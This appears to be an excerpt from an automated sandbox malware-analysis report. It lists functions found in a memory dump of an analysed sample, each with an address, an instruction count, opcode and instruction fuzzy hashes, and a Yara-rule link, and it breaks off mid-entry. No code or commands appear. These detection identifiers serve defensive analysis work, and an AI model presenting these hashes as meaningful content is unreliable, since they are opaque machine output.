                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 79967b273ec546a972a70de6745dbae26f9241ef477e27104b15b8012b61f9a8
                                      • Instruction ID: e7d142d35fae7406e8f07e0f693cc588d618d03fd2575967159b311bcde86f6a
                                      • Opcode Fuzzy Hash: 79967b273ec546a972a70de6745dbae26f9241ef477e27104b15b8012b61f9a8
                                      • Instruction Fuzzy Hash: A2018471A01259EBDB10EBA9D849FAEBBF8EF54704F444066F901EB280D674DA01C794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 018693EB Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                      • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                      • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                      • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 018752F6 Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ba87d531379b07c3be2adb6a05fc4010aec8639300aafcf1607da9f928c876f7
                                      • Instruction ID: a59e54f4d21637d958f4fddccd62625ce3cea1fede268603f77e429ae627646b
                                      • Opcode Fuzzy Hash: ba87d531379b07c3be2adb6a05fc4010aec8639300aafcf1607da9f928c876f7
                                      • Instruction Fuzzy Hash: 27116D74D00259EFCB00DFA9D548A9EB7F4FF18704F14805AA915EB390D774DA02CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 018751F7 Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7585305ec8944c1047caf7929bbf399e281213487378fe38eea26fd9739dbd67
                                      • Instruction ID: ff27f8f8ef523826b0c1efececb5740e0793b09ec3a4863957badcced88f284a
                                      • Opcode Fuzzy Hash: 7585305ec8944c1047caf7929bbf399e281213487378fe38eea26fd9739dbd67
                                      • Instruction Fuzzy Hash: DC110970A1124ADFDB04DFA9D545BADFBF4FF08704F1442AAE509EB782E634DA418B90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0179C2B0 Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a23a74abeef7df39ca4d0782f059420ad1b22dcd26f2a249a84cb06136c79114
                                      • Instruction ID: 1400afcc78875f8573029346f42bc8ffe2667794e3bc0e905c47805967603b8e
                                      • Opcode Fuzzy Hash: a23a74abeef7df39ca4d0782f059420ad1b22dcd26f2a249a84cb06136c79114
                                      • Instruction Fuzzy Hash: 23F04C332045239BDF3317D95845B27E9A99FD5A60F1500B5B60ABB244CA608C0592D4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0185F549 Relevance: .0, Instructions: 41COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1df7aaa6c4eb2d8f3ba083b50defc1120c9e8fe50cb66fae042dee7c61261d84
                                      • Instruction ID: 76a5c7d329421ded767f4cb96a28bf54cae873b0073d6c709470b62c98603fc3
                                      • Opcode Fuzzy Hash: 1df7aaa6c4eb2d8f3ba083b50defc1120c9e8fe50cb66fae042dee7c61261d84
                                      • Instruction Fuzzy Hash: 52F0C831A10258AFDB04DFB9D549AEEB7F9EF48714F00849AF901F7280DA74DA05C750
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 018750BC Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a5e8d8557c6a37e2241eaaa5ee4be38b15fbe971b01f53b27e1c72bad1f36329
                                      • Instruction ID: 2c24fa5d46b9a02085aeeae74e42fd74b7a6f597de5478b21925d5f70ca62c0b
                                      • Opcode Fuzzy Hash: a5e8d8557c6a37e2241eaaa5ee4be38b15fbe971b01f53b27e1c72bad1f36329
                                      • Instruction Fuzzy Hash: 3F012170E1020ADFDB44DFA9D545B9EFBF4FF08304F1481A5A509EB381DA34DA418BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0179C090 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 217818d241a1b56c394881ec454e7d42acfbfbbf914531f6e7a2b3257e3a21b2
                                      • Instruction ID: 6f66ce346781abc6614c5ae68b93de34922c1a219bc3ea7338308d593c9e12b1
                                      • Opcode Fuzzy Hash: 217818d241a1b56c394881ec454e7d42acfbfbbf914531f6e7a2b3257e3a21b2
                                      • Instruction Fuzzy Hash: FFF024326483415BFF2A961DAC05B33F38AF7C2710F24807AEB058B2D5EA71DC058354
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0182C56D Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 89e5f341a4d452e91db5142f13233f399dc7af0ba99f33442ef3dc3c8659c161
                                      • Instruction ID: b341d5de9e419ef18f681d090b866da47e6bd3277f578e42bacc96fb3f6584aa
                                      • Opcode Fuzzy Hash: 89e5f341a4d452e91db5142f13233f399dc7af0ba99f33442ef3dc3c8659c161
                                      • Instruction Fuzzy Hash: B3F0AF702053449FC710EF28C549A2ABBE4FF98704F80465AB898DB398E734EA00CB96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0185F0A6 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f0119d36c149d83571b3c8004ac03f87dae70fc8008033ebef1c388f7709d9b0
                                      • Instruction ID: ec82e5a2f76cb1b3807dc3c23a8a4651f11ad66896d4148e35b18c87a0bd47da
                                      • Opcode Fuzzy Hash: f0119d36c149d83571b3c8004ac03f87dae70fc8008033ebef1c388f7709d9b0
                                      • Instruction Fuzzy Hash: 69F03C70A01249EFCB44EFA9D549A9EBBF4EF18304F548069B905EB381D674DA40CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01875289 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 61fa29b25025ae118eca64f5589c1ea57ba1e78304182a2b8715fc988b92419b
                                      • Instruction ID: 7d0566f0779efd67df39112b0b1dbd2bf815a6943c4702f9d70ce29d41c9ff91
                                      • Opcode Fuzzy Hash: 61fa29b25025ae118eca64f5589c1ea57ba1e78304182a2b8715fc988b92419b
                                      • Instruction Fuzzy Hash: 5BF04974A10249EFDB00EFA9D559A9EBBF4FF18304F50846AB905EB381E674EB00CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017992AF Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4b3f1695b0f6026db0f8e7db37de3d6804453cc177eb98f65bdfaba14fc15c14
                                      • Instruction ID: 240ac38ccbf078748f5c328983077f879a326ca3261d31436159229269262d9b
                                      • Opcode Fuzzy Hash: 4b3f1695b0f6026db0f8e7db37de3d6804453cc177eb98f65bdfaba14fc15c14
                                      • Instruction Fuzzy Hash: 33F0F0321047006BEB319B48DC09F9BFBFDEF80704F08015DE642930A1D6A0A909C760
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0185F387 Relevance: .0, Instructions: 33COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9b339a81d23189abfe119e581ee8fb3ff6a36c31d07aafd2445a81c41f7dc636
                                      • Instruction ID: a6237db97506fa0ef0d824a5062ae64765a98eb74f95020404ae2c364a67e88c
                                      • Opcode Fuzzy Hash: 9b339a81d23189abfe119e581ee8fb3ff6a36c31d07aafd2445a81c41f7dc636
                                      • Instruction Fuzzy Hash: 3FF09070A10249EFDB04EFA9D549EAEBBF4FF18304F00446AAA01EB391E634DA00CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E25D9 Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e78874bf520fe222bb7d54b418da7df1c96898a41e0560cae44803ed8fd049f5
                                      • Instruction ID: 3840e9bbaee6c873c98663b2e2cf4f53bf5e5ed623aad2f3da5d3eea1f4229b3
                                      • Opcode Fuzzy Hash: e78874bf520fe222bb7d54b418da7df1c96898a41e0560cae44803ed8fd049f5
                                      • Instruction Fuzzy Hash: 58E092723006012BE7129E598CC8F47ABEEDF96714F040979B5045F142CAE29C0986A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017DC5AD Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2cbdf20204f2e4bcbad41dba37bf405049cc05d03e712357e820d226b07da733
                                      • Instruction ID: 86316d6907a2b17531d64f892750d1476f141896dda649bf48d3f4cd2f799b6f
                                      • Opcode Fuzzy Hash: 2cbdf20204f2e4bcbad41dba37bf405049cc05d03e712357e820d226b07da733
                                      • Instruction Fuzzy Hash: 93F0ECB15126989BE727935CC088B62FBFC9B04660FB88169E507C7512CB60D880C240
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0187505D Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3957b1d4337d91246bc93c36a9c37be7487b3a2dff01d126adb9eeb01075e764
                                      • Instruction ID: 93687bade1a7ffe65de21b65bb54fba4ad2c79bc3e53c204fa0ad620e60919fb
                                      • Opcode Fuzzy Hash: 3957b1d4337d91246bc93c36a9c37be7487b3a2dff01d126adb9eeb01075e764
                                      • Instruction Fuzzy Hash: AAF05E70A10249EFDB04EBB9D549EAEBBF4AF18704F508499E902EB285DA34DA018B54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0187519B Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 89e218a911f868c9fb0b799bc47213e5fc10e81e81f94c3a717855b24a60f96d
                                      • Instruction ID: e261d95417a7b26142ca8a8b4860d088b646fc2456de8903abb7dd5d104d3f0a
                                      • Opcode Fuzzy Hash: 89e218a911f868c9fb0b799bc47213e5fc10e81e81f94c3a717855b24a60f96d
                                      • Instruction Fuzzy Hash: A6F08270A04249ABDB04EBA9E959F9EB7F4AF08704F540099AA01EB2C4DA34DA008724
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017D71C8 Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6edfa7c3116d9af43a415dcc79f7f5feb73d8e17160ede48053d79c4ce1f15db
                                      • Instruction ID: 8bc2a6167abc9ce3ae1a5d294717bd5932a9a28da8778d783a745fe3418c45e8
                                      • Opcode Fuzzy Hash: 6edfa7c3116d9af43a415dcc79f7f5feb73d8e17160ede48053d79c4ce1f15db
                                      • Instruction Fuzzy Hash: 91F0A033A966A49FD732D7ECD0C4F22BBEC9B44775F098161E809C7506C364DE80C255
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0187513F Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a52e973a3abaceff4580a6d8068d2869216e93c69da5cf799dc0ce3000a2f739
                                      • Instruction ID: 287b14f2ea0b4dd2c58081fa8f5599b465c68223d119e7a6a2bfd7bce4c24cff
                                      • Opcode Fuzzy Hash: a52e973a3abaceff4580a6d8068d2869216e93c69da5cf799dc0ce3000a2f739
                                      • Instruction Fuzzy Hash: F0F08270A00649ABDB04DBA9E949E9EB7F4AF18704F540455E502EB2D4EA34DA008724
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01875001 Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f87c53a6f790c7eb83d9ec06720cd4409876be3a58d6f65f747e2c59c3c6381
                                      • Instruction ID: dbad0bfd246f1734f8c6466432453101d1361fd63e6b7ac0be533fe6619aa2d1
                                      • Opcode Fuzzy Hash: 4f87c53a6f790c7eb83d9ec06720cd4409876be3a58d6f65f747e2c59c3c6381
                                      • Instruction Fuzzy Hash: BAF0A770A01249EFDB04DBB9D549E9EB7F4EF18344F540099E502EB3C0EA34DA018754
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0185F3EE Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a751a38b39bd24e6a93f2e1a7b7738ad212324c256c5bb3fd6f41d2315b01cf0
                                      • Instruction ID: d5ef0682079298989bb0d9ebb77327e98232a1763c5ac1d978947b52bc430f82
                                      • Opcode Fuzzy Hash: a751a38b39bd24e6a93f2e1a7b7738ad212324c256c5bb3fd6f41d2315b01cf0
                                      • Instruction Fuzzy Hash: 81F08270A01249ABDB04DBA9D599E9EBBF4EF08704F440065EA02EB2C0D974DA418754
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017A2540 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: b5bff7aa1338c30e73f9c8df84d2b6a87e241d096f6fc70a233da8821a153d57
                                      • Instruction ID: 7c1039030f3b0c7f58d1827198d9abdd35da433f6a6a152997a54a4c40ac03cd
                                      • Opcode Fuzzy Hash: b5bff7aa1338c30e73f9c8df84d2b6a87e241d096f6fc70a233da8821a153d57
                                      • Instruction Fuzzy Hash: 90E092331006419BC722BB18DC19F8BB7DAEFA0361F144614B166571A5CB70A910CBC4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017981EB Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9450d22c062193ca0b96a6b6e499c594998d4001dd6880e2345fbd976773c583
                                      • Instruction ID: a7ab683836c88623683813df351e67b9e2d61ef96d08f8dd00d8ed814249ab1d
                                      • Opcode Fuzzy Hash: 9450d22c062193ca0b96a6b6e499c594998d4001dd6880e2345fbd976773c583
                                      • Instruction Fuzzy Hash: 76E07232080208EECF322F28EC18F52F6E5FF08310F20086DF181030A98BB08880CB05
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0185B090 Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ec3c823464b6ee5cca4ae2b1b8df96e372f4d9e45ed4a47de14cd1f490d5390c
                                      • Instruction ID: 0cb12831b2d618bed1e411fc2eff98b8c153236f32357b4eb07118a6484445e5
                                      • Opcode Fuzzy Hash: ec3c823464b6ee5cca4ae2b1b8df96e372f4d9e45ed4a47de14cd1f490d5390c
                                      • Instruction Fuzzy Hash: 04E0C231280609BBDF221A44CC01FB6BA1AEF607A0F104031FE08ABAA0CA719D91D6C4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0179B502 Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dde77213a17f7a11a8b2c8af392bc784e301e8e2bd72c657f04857ab6c0fb0f3
                                      • Instruction ID: 0f0336095f3ef677496e825c5d562d281596e964a9b23e9714cbda5c0250a4eb
                                      • Opcode Fuzzy Hash: dde77213a17f7a11a8b2c8af392bc784e301e8e2bd72c657f04857ab6c0fb0f3
                                      • Instruction Fuzzy Hash: 53D05E31091610ABDB326F18FD09F93BAB6EF90F10F250528B101174F88AB1ED88C694
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017DE55C Relevance: .0, Instructions: 16COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a7430d6abf8e822ce7d0cceab22562b8e40fbea7628dab3a24fd1f76fb763ba5
                                      • Instruction ID: 0a4fb0400a6eea5f029f6f05ab79ca8efb4ae800a4a377a07e77475d6afa496d
                                      • Opcode Fuzzy Hash: a7430d6abf8e822ce7d0cceab22562b8e40fbea7628dab3a24fd1f76fb763ba5
                                      • Instruction Fuzzy Hash: DAD0A933204A10ABCB32AA1CFC04FC373E8BB88721F120459F108C70A8D368AC81C680
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0181E5C8 Relevance: .0, Instructions: 16COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 889ecd962d74d48fb7db4d9f0524f3cd8c69ff8a978b39ae2bcdf3542e760d84
                                      • Instruction ID: 219445200c5cef90da008d0a620cbf160012535bcdf04cb1e9ba1208098b6fa2
                                      • Opcode Fuzzy Hash: 889ecd962d74d48fb7db4d9f0524f3cd8c69ff8a978b39ae2bcdf3542e760d84
                                      • Instruction Fuzzy Hash: C7E0EC369406849FDF13DB99C654F9AFBB9BB94B40F190054B5089B669D734EA40CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0179A093 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ae463c8ff6160db86dd4874a28af28f0b4fccee573810f5be71e83db8e6df9fa
                                      • Instruction ID: 17d94801cd16cd441baa472095c2b5667eeb63aeefa55120b9f7a2f7d41f54f1
                                      • Opcode Fuzzy Hash: ae463c8ff6160db86dd4874a28af28f0b4fccee573810f5be71e83db8e6df9fa
                                      • Instruction Fuzzy Hash: C5D0123220707197DF29665D7958FA7F915EB81A50F1A006D790A93914C5148C82D6E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017B0200 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a51fb9a7edfb4f30b775e48456de62e3c28e79e1d112d76bb5101b6f764d5470
                                      • Instruction ID: b736626c78dddc1fcf58888adce7722dbc733406caebec7165745cfeaca031c2
                                      • Opcode Fuzzy Hash: a51fb9a7edfb4f30b775e48456de62e3c28e79e1d112d76bb5101b6f764d5470
                                      • Instruction Fuzzy Hash: BDD0C935252D84CFD617CB4CC8A4B4673B4BB04B40FC10890E900CB762E37CD944CA00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017C336D Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 06d76737cff382675b529d8fa667a4d70d3a383e9a5c29becea55070c9de762f
                                      • Instruction ID: c2970b4a409bb851fbed6e18bab17dec506243ce706790bf6df0d268db07817d
                                      • Opcode Fuzzy Hash: 06d76737cff382675b529d8fa667a4d70d3a383e9a5c29becea55070c9de762f
                                      • Instruction Fuzzy Hash: 30C08C741412806AEF2A5704C915B29BA50BB00B05F88059CAE001D5A2C76898028308
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E3590 Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b218ef53de92401d4160977a5c89e1be06439b987de25850afce14a09a5306f7
                                      • Instruction ID: e006546a1d19de49cdc7bcd489d56a06d9ab87ebfd149b92d7981b2c6046be68
                                      • Opcode Fuzzy Hash: b218ef53de92401d4160977a5c89e1be06439b987de25850afce14a09a5306f7
                                      • Instruction Fuzzy Hash: FC90023161514442DA10A25844047075415D7D0301F51C425A2425578EC7658A65A263
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E3050 Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
